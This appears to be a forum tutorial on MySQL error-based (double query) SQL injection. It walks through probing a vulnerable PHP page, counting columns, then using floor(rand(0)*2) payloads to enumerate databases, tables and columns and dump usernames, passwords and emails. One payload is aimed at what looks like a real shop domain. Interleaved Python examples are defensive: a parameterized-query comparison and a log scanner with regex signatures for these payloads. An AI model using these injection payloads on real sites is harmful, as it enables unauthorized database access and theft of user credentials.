Let's start injection
What you need: a vulnerable site like this
Code:
www.site.com/artist.php?i=36
First, test the site for the vulnerability
Code:
www.site.com/artist.php?i=36'
We get an error.
OK, let's inject this
Code:
www.site.com/artist.php?i=36 order by 10--    (no error)
www.site.com/artist.php?i=36 order by 20--    (no error)
www.site.com/artist.php?i=36 order by 50--    (no error)
www.site.com/artist.php?i=36 order by 100--   (no error)
So it looks like a string-based injection; let's try this
Code:
www.site.com/artist.php?i=36' order by 100--+
Now we get an error on the column count.
Now let's find the number of columns
Code:
www.site.com/artist.php?i=36' order by 10--+   (error)
www.site.com/artist.php?i=36' order by 8--+    (error)
www.site.com/artist.php?i=36' order by 6--+    (error)
www.site.com/artist.php?i=36' order by 5--+    (no error)
OK, we found the number of columns. The next step is to use UNION to find the vulnerable column to inject into.
Code:
www.site.com/artist.php?i=36' union select 1,2,3,4,5--+
So what can we do? Let's try another method, like blind injection, and see.
Code:
www.site.com/artist.php?i=36' and 1=1--+   (true; no error from this)
www.site.com/artist.php?i=36' and 1=2--+   (false, and still no error)
What now? Should we give up and find another site?
No, let's try another method, called ERROR BASED INJECTION (DOUBLE QUERY).
In this method we use specific syntax to get data from the database.
The code we use to get the version, the database and also the user looks like this:
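The probes above only make sense once you see what they do to the query on the server side. The following is an added example, not code from the original post: it builds a constructed SQLite stand-in for the artist.php lookup (table and row values are invented) and runs the walkthrough's probes, decoded from their URL form, through both the vulnerable string-concatenated query and a parameterized one. It shows why the bare numeric probe (order by 100 without a quote) is harmless when the parameter sits inside quotes, why the quoted probe raises an error, and why the bound-parameter version never errors or changes its result, which is the fix a defender wants.

```python
import sqlite3


def make_db():
    """Constructed stand-in for the artist.php lookup: a text column "i",
    so the request parameter sits inside quotes exactly as on the page."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE artist (i TEXT PRIMARY KEY, name TEXT)")
    conn.executemany(
        "INSERT INTO artist VALUES (?, ?)",
        [("36", "constructed artist"), ("37", "another constructed artist")],
    )
    return conn


def lookup_concat(conn, i):
    """Vulnerable form: the request parameter is pasted into a quoted literal.
    Returns ("ok", rows) or ("error", message); the error text is exactly what
    a page that prints database errors leaks to the client."""
    sql = "SELECT name FROM artist WHERE i = '" + i + "'"
    try:
        return ("ok", [row[0] for row in conn.execute(sql)])
    except sqlite3.Error as exc:
        return ("error", str(exc))


def lookup_param(conn, i):
    """Hardened form: a bound parameter is data, never parsed as SQL, so every
    probe is just looked up literally and tells the caller nothing."""
    rows = conn.execute("SELECT name FROM artist WHERE i = ?", (i,))
    return ("ok", [row[0] for row in rows])


# The probes from the walkthrough, URL-decoded ("+" and "%27" become " " and "'").
PROBES = [
    "36",
    "36'",
    "36 order by 100-- ",
    "36' order by 100-- ",
    "36' order by 1-- ",
    "36' and 1=1-- ",
    "36' and 1=2-- ",
]


def run_probes(conn, lookup):
    """Map each probe to the outcome of one lookup function."""
    return {probe: lookup(conn, probe) for probe in PROBES}


if __name__ == "__main__":
    db = make_db()
    for label, fn in (("concatenated", lookup_concat), ("parameterized", lookup_param)):
        print(f"== {label} ==")
        for probe, outcome in run_probes(db, fn).items():
            print(f"{probe!r:28} -> {outcome}")
```

With the concatenated query, "36 order by 100-- " is swallowed inside the string literal (no error, no row), "36'" leaves an unterminated literal (error), and "36' order by 100-- " escapes the literal so ORDER BY fails on the column count; "and 1=2" silently empties the result, which is the boolean-blind signal. The parameterized lookup returns ("ok", []) for every malformed probe and the real row only for "36".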
Code:
and(select 1 from(select count(*),concat((select (select
concat(0x7e,0x27,cast(version() as char),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from
information_schema.tables group by x)a) and 1=1
Now let's try this syntax on our site
Code:
http://www.site.com/artist.php?i=36' and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,cast(version() as char),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1--+
[img]http://img830.imageshack.us/img830/2218/81406053.png[/img]
Notice: We don't have to use these hex values
Code:
0x7e,0x27
We can use the syntax without them, and then our code looks like this:
Code:
http://www.site.com/artist.php?i=36' and(select 1 from(select count(*),concat((select (select concat(version())) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1--+
It works fine, but there is another problem you should know about. When we remove the hex values from the code, the result looks like this:
As you can see, there is a stray "1" next to the version string, and it will stay there in all our results, so it may confuse someone who is new to this type of injection.
In this tutorial I write all syntax with the hex values.
Tip: If our target uses version 4 or lower, we can use this syntax for getting the version and database name. Look at this:
Code:
http://www.kusuri.co.uk/view_product.php?id=242 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,cast(version() as char),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1--+
Don't worry. There is another code for this type of site; you can find the version, database and user of the site with code like this:
Code:
or 1 group by concat_ws(0x7e,version(),user(),database(),floor(rand(0)*2)) having min(0) or
Now let's try this on the site
Code:
http://www.kusuri.co.uk/view_product.php?id=242 or 1 group by concat_ws(0x7e,version(),user(),database(),floor(rand(0)*2)) having min(0) or 1--+
As you see in the pic, the version is 4 and we succeeded in finding it.
Now we have the version and database; let's move on and inject our target.
To extract how many databases exist on the site we use another syntax, like this one:
Code:
and(select 1 from(select count(*),concat((select (select (select
concat(0x7e,0x27,count(schema_name),0x27,0x7e) FROM information_schema.schemata LIMIT 0,1)) from information_schema.tables
limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
Check the results for our target
Code:
http://www.site.com/artist.php?i=36' and(select 1 from(select count(*),concat((select (select (select
concat(0x7e,0x27,count(schema_name),0x27,0x7e) from information_schema.schemata limit 0,1)) from information_schema.tables
limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1--+
Now, using this code and changing the LIMIT, we can find all the DBs
Code:
http://www.site.com/artist.php?i=36' and(select 1 from(select count(*),concat((select (select (select
concat(0x7e,0x27,concat(schema_name),0x27,0x7e) from information_schema.schemata limit 0,1)) from information_schema.tables
limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1--+
By changing the first LIMIT we can get all the entries from the DB, like this:
Code:
limit 0,1 for the first entry
limit 1,1 for the second entry
.
.
.
limit N,1 for entry number N (counting from 0)
To get the tables from a database I use this: " table_schema=0x{hex-database-name} "
First take a look: how many tables does our picked DB have?
Code:
http://www.site.com/artist.php?i=36' and(select 1 from(select count(*),concat((select (select (select concat(0x7e,0x27,count(table_name),0x27,0x7e) from information_schema.tables where table_schema=0x{hex-database-name} limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1--+
Code:
http://www.site.com/artist.php?i=36' and(select 1 from(select count(*),concat((select (select (select concat(0x7e,0x27,concat(table_name),0x27,0x7e) from information_schema.tables where table_schema=0x{hex-database-name} limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1--+
By giving a number for the first LIMIT, all the tables are counted through.
I found the table name " mass_users ", and now we should extract the column names of this table to gain admin access.
Code:
http://www.site.com/artist.php?i=36' and(select 1 from(select count(*),concat((select (select (select concat(0x7e,0x27,count(column_name),0x27,0x7e) from information_schema.columns where table_schema=0x{hex-database-name} and table_name=0x6d6173735f7573657273 limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1--+
It only has five columns; let's get them
Code:
http://www.site.com/artist.php?i=36' and(select 1 from(select count(*),concat((select (select (select concat(0x7e,0x27,concat(column_name),0x27,0x7e) from information_schema.columns where table_schema=0x{hex-database-name} and table_name=0x6d6173735f7573657273 limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1--+
[img]img209.imageshack.us/img209/949/userb.png[/img]
All the columns are here:
Code:
id,username,password,firstname,email
Last step: extract the values of these columns
Code:
http://www.site.com/artist.php?i=36' and (select 1 from(select count(*),concat((select concat(username,0x3a,password,0x3a,email) from mass_users limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1--+
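Every request in this walkthrough, from the first quote probe to the final double-query extraction, lands in the web server's access log. The following is an added example from the defender's side, not code from the original post: it URL-decodes the request target of each common-log-format line (so "+" and "%27" are seen as the space and quote the database saw) and matches it against signatures taken from the payloads shown above, then counts hits per client address. The log lines are constructed for the example; the addresses, timestamps and status codes are invented.

```python
import re
from collections import Counter
from urllib.parse import unquote_plus

# Common log format; the request target is the part we inspect.
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>\S+)" (?P<status>\d{3})'
)

# Signatures taken from the probes and payloads in the walkthrough, matched
# against the URL-decoded target, in the order the walkthrough uses them.
SIGNATURES = {
    "quote_after_number": re.compile(r"=\d+'(?=\s|&|$)"),
    "order_by_probe": re.compile(r"'\s*order\s+by\s+\d+\s*--", re.I),
    "union_select": re.compile(r"\bunion\s+select\b", re.I),
    "information_schema": re.compile(
        r"\binformation_schema\.(?:tables|columns|schemata)\b", re.I),
    "double_query_group_key": re.compile(
        r"floor\s*\(\s*rand\s*\(\s*0\s*\)\s*\*\s*2\s*\)", re.I),
    "concat_ws_having": re.compile(
        r"concat_ws\s*\(.*\bhaving\s+min\s*\(\s*0\s*\)", re.I | re.S),
}


def scan_line(line):
    """Return a hit record for one log line, or None if it is clean/unparsable."""
    m = LOG_LINE.match(line)
    if not m:
        return None
    target = unquote_plus(m.group("target"))  # "%27" -> "'", "+" -> " "
    rules = [name for name, rx in SIGNATURES.items() if rx.search(target)]
    if not rules:
        return None
    return {"ip": m.group("ip"), "status": int(m.group("status")),
            "target": target, "rules": rules}


def scan_log(text):
    """All hits in a log, in file order."""
    return [hit for hit in (scan_line(l) for l in text.splitlines()) if hit]


def summarize(text):
    """Hits per client IP: one address stepping through quote, ORDER BY, UNION
    and double-query payloads in sequence is the pattern to alert on."""
    return dict(Counter(hit["ip"] for hit in scan_log(text)))


# Constructed sample log: one client replaying the walkthrough against artist.php.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Oct/2012:13:55:36 +0000] "GET /artist.php?i=36 HTTP/1.1" 200 5123
203.0.113.5 - - [10/Oct/2012:13:55:40 +0000] "GET /artist.php?i=36%27 HTTP/1.1" 500 412
203.0.113.5 - - [10/Oct/2012:13:56:02 +0000] "GET /artist.php?i=36%27+order+by+100--+ HTTP/1.1" 500 412
203.0.113.5 - - [10/Oct/2012:13:56:30 +0000] "GET /artist.php?i=36%27+union+select+1,2,3,4,5--+ HTTP/1.1" 200 5123
203.0.113.5 - - [10/Oct/2012:13:57:10 +0000] "GET /artist.php?i=36%27+and(select+1+from(select+count(*),concat((select+(select+concat(0x7e,0x27,cast(version()+as+char),0x27,0x7e))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1--+ HTTP/1.1" 500 611
198.51.100.7 - - [10/Oct/2012:13:58:00 +0000] "GET /artist.php?i=37 HTTP/1.1" 200 4980
"""

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit["ip"], hit["status"], hit["rules"], hit["target"][:60])
    print(summarize(SAMPLE_LOG))
```

Decoding before matching matters: the error-based payload arrives with "+" for every space, so a signature written against raw log text would miss "group by x" and "floor(rand(0)*2)". The 5xx status on the probe lines is the second signal worth correlating, since the technique depends on the page returning the database error to the client.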